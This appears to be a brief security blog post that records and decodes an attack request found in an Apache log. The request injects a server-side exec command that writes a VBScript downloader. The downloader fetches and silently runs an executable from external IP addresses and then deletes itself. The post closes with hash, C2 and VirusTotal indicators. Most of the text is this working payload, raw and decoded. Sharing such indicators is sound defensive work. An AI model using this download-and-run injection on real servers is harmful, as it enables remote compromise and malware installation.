Random logrow found in Apache

####
thembits.blogspot.com
@tehsyntx
####

Raw logrow:
122.228.207.244 - - [24/Sep/2014:20:42:32 +0200] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shel
l%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse
%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fg
etsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%
29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3A
sGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.Sc
riptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 518 "-" "-"

************************

{.exec | cmd.exe / c echo > 22222.vbs dim wait, quit, out:
    Set xml = CreateObject("Microsoft.XMLHTTP"):
    Set WshShell = Wscript.CreateObject("WScript.Shell"):
    DS = Array("123.108.109.100", "123.108.109.100:53", "123.108.109.100:443", "178.33.196.164", "178.33.196.164:53", "178.33.196.164:443"):
    for each Url in DS:
    wait = true: quit = false:
    D(Url):
    if quit then:
    exit
for: end
if :next: Sub D(Url): if IsObject(xml) = false then: Set xml = CreateObject("Microsoft.XMLHTTP"): end
if :xml.Open "GET",
"http://" ^ & Url ^ & "/getsetup.exe",
True: xml.OnReadyStateChange = GetRef("xmlstat"): out = Now: xml.Send(): while (wait and 60 ^ > abs(datediff("s", Now, out))): wscript.sleep(1000): wend: End Sub: sub xmlstat( %
    29: If xml.ReadyState ^ < ^ > 4 Then: exit sub: end
    if :wait = false: if xml.status ^ < ^ > 200 then: exit sub: end
    if :quit = true: on error resume next: set sGet = CreateObject("ADODB.Stream"): sGet.Mode = 3:
    sGet.Type = 1: sGet.Open(): sGet.Write xml.ResponseBody: sGet.SaveToFile "ko.exe", 2: End sub: WshShell.run "ko.exe", 0, 0: Set fso = CreateObject("Scripting.Filesystemobject"): fso.DeleteFile(WScript.Sc riptFullName) & cscript 22222.vbs.
}

************************

getsetup.exe
MD5: 519048ffc7f6c38ab8cb4e0ddac3fad3
CnC: 66.102.253.25:666, 119.145.148.105:666
VT: 40/54 (https://www.virustotal.com/en/file/ea817834fff18e40581f096371be2a7eb062325475805e2b9c51d186ac820137/analysis/)